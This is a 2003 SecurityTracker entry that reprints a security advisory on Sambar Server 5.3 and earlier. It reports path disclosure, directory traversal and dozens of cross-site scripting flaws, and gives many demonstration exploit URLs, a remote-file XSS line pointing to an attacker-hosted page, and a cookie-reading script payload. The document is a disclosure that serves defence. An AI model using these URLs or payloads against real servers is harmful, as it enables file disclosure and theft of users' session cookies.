Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Sambar Server Input Validation Flaws Disclose Files on the System to Remote Users and Permit Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1006390 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 27 2003
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Exploit Included: Yes
|
Advisory: Security-Corp
|
Version(s): 5.3 and prior versions
|
Description: Security Corporation reported several vulnerabilities in Sambar Server. A remote user can obtain information about the server environment,
as well as the contents of directories and files on the system. A remote user can also conduct cross-site scripting attacks against
Sambar Server users.
It is reported that the default installation includes the 'testcgi.exe' and 'environ.pl' scripts. A remote user can query these
scripts to obtain information about the system environment, including the installation path:
http://[target]/cgi-bin/environ.pl
http://[target]/cgi-bin/testcgi.exe
A remote user can reportedly view directory contents and file contents by requesting the following type of URL:
http://[target]/sysuser/docmgr/iecreate.stm?template=.
./
http://[target]/sysuser/docmgr/ieedit.stm?url=../
Numerous scripts on the server fail to filter HTML code from user-supplied
input when displaying the input, according to the advisory. A remote user can create a specially crafted URL that, when loaded
by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from
the site running Sambar Server and will run in the security context of that site. As a result, the code will be able to access the
target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the
target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit URLs
are provided:
http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]
http://[target]/netutils/whodata.stm?sitename=[hostile_code]
http://[target]/netutils/findata
.stm?user=[hostile_code]
http://[target]/netutils/findata.stm?host=[hostile_code]
http://[target]/isapi/testisa.dll?check1=[hostile_code]
http://[target]/cgi-bin/envir
on.pl?param1=[hostile_code]
http://[target]/samples/search.dll?query=[hostile_code]&logic=AND
http://[target]/wwwping/index.stm?wwwsite=[hostile_code]
http://[target]/
syshelp/stmex.stm?foo=[hostile_code]&bar=456
http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]
http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_cod
e]
http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]
http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]
http://[target]/sysuser/docmgr/ieedit
.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]
http://[target]/sysu
ser/docmgr/edit.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]
h
ttp://[target]/sysuser/docmgr/info.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/ftp.stm?path=[host
ile_code]
http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/r
ename.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]
http://[targe
t]/sysuser/docmgr/search.stm?query=[hostile_code]
http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/sendmail.stm?name=[host
ile_code]
http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/
update.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]
http:/
/[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vchist.stm?path
=[hostile_code]
http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]
http://[target]/cgi-bin/testcgi.exe?[hostile_code]
The
vendor has reportedly been notified.
|
Impact: A remote user can determine information about the system, including the installation path.
A remote user can view directory and
file contents for directories and files that are readable by the web server.
A remote user can access the target user's cookies
(including authentication cookies), if any, associated with the site running Sambar Server, access data recently submitted by the
target user via web form to the site, or take actions on the site acting as the target user.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.sambar.com/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Windows (Any)
|
Reported By: "Gregory Le Bras | Security Corporation" <gregory.lebras@security-corporation.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 27 Mar 2003 15:26:45 +0100
From: "Gregory Le Bras | Security Corporation" <gregory.lebras@security-corporation.com>
Subject: [SCSA-012] Multiple vulnerabilities in Sambar Server
|
________________________________________________________________________
Security Corporation Security Advisory [SCSA-012]
________________________________________________________________________
PROGRAM: Sambar Server
HOMEPAGE: http://www.sambar.com/
VULNERABLE VERSIONS: 5.3 and prior
________________________________________________________________________
DESCRIPTION
________________________________________________________________________
"Sambar Server is the new standard in high performance multi-functional
servers with features rivaling other commercial products selling
separately for several hundreds of dollars. It's Winsock2 compliant Win32
integration functions on Windows 95, Windows 98, Windows NT, Win2000,
and XP as a service or as an application."
(direct quote from http://sambar.jalyn.net)
DETAILS & EXPLOITS
________________________________________________________________________
¤ Path Disclosure :
Sambar default's installation of the CGI bin directory contains
a testcgi.exe and a environ.pl that allows remote users to view
information regarding the operating system and
web server's directory.
These vulnerabilities can be triggered by a remote user submitting
a specially crafted HTTP request.
- Exploits :
http://[target]/cgi-bin/environ.pl
http://[target]/cgi-bin/testcgi.exe
Will produce the following output:
- environ.pl :
--------------
Sambar Server CGI Environment Variables
GATEWAY_INTERFACE: CGI/1.1
PATH_INFO:
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl
QUERY_STRING:
REMOTE_ADDR: 127.0.0.1
REMOTE_HOST:
REMOTE_USER:
REQUEST_METHOD: GET
DOCUMENT_NAME: environ.pl
DOCUMENT_URI: /cgi-bin/environ.pl
SCRIPT_NAME: /cgi-bin/environ.pl
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl
SERVER_NAME: localhost
SERVER_PORT: 80
SERVER_PROTOCOL: HTTP/1.1
SERVER_SOFTWARE: SAMBAR
CONTENT_LENGTH: 0
CONTENT:
- testcgi.exe :
---------------
Test CGI ... Version 1.00 [ build date 8-03-97 ]
QUERY_STRING
PATH_INFO
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe
SCRIPT_NAME /cgi-bin/testcgi.exe
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe
DOCUMENT_ROOT C:/sambar53/docs/
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
REMOTE_ADDR 127.0.0.1
REMOTE_HOST
SERVER_NAME localhost
SERVER_PROTOCOL HTTP/1.1
SERVER_SOFTWARE SAMBAR
CONTENT_TYPE
----------------------------
¤ Directory Disclosure :
Other security vulnerabilities was found in Sambar which allow an
attacker to reveal the content of the files and the directories
on the web server, even if it should not be revealed.
These vulnerabilities can be simply exploited by requesting a
specially crafted URL utilizing iecreate.stm and ieedit.stm
application with a '../' appended.
- Exploits :
http://[target]/sysuser/docmgr/iecreate.stm?template=../
http://[target]/sysuser/docmgr/ieedit.stm?url=../
----------------------------
¤ Cross Site Scripting :
Many exploitable bugs was found on Sambar Server which cause script
execution on client's computer by following a crafted url.
This kind of attack known as "Cross-Site Scripting Vulnerability" is
present in many section of the web site, an attacker can input
specially crafted links and/or other malicious scripts.
- Exploits :
http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]
http://[target]/netutils/whodata.stm?sitename=[hostile_code]
http://[target]/netutils/findata.stm?user=[hostile_code]
http://[target]/netutils/findata.stm?host=[hostile_code]
http://[target]/isapi/testisa.dll?check1=[hostile_code]
http://[target]/cgi-bin/environ.pl?param1=[hostile_code]
http://[target]/samples/search.dll?query=[hostile_code]&logic=AND
http://[target]/wwwping/index.stm?wwwsite=[hostile_code]
http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456
http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]
http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]
http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]
http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]
http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]
http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]
http://[target]/cgi-bin/testcgi.exe?[hostile_code]
- An other Cross Site Scripting can be exploited with a
remote file where's include the hostile code like this :
http://[target]/sysuser/docmgr/ieedit.stm?url=http://[attacker]/hostile_file
.htm
The hostile code could be :
[script]alert("Cookie="+document.cookie)[/script]
(open a window with the cookie of the visitor.)
(replace [] by <>)
SOLUTIONS
________________________________________________________________________
No solution for the moment.
VENDOR STATUS
________________________________________________________________________
The vendor has reportedly been notified.
LINKS
________________________________________________________________________
- http://www.security-corp.org/index.php?ink=4-15-1
- Version Française :
http://www.security-corporation.com/index.php?id=advisories&a=012-FR
------------------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
------------------------------------------------------------------------
|
|
Go to the Top of This SecurityTracker Archive Page
|
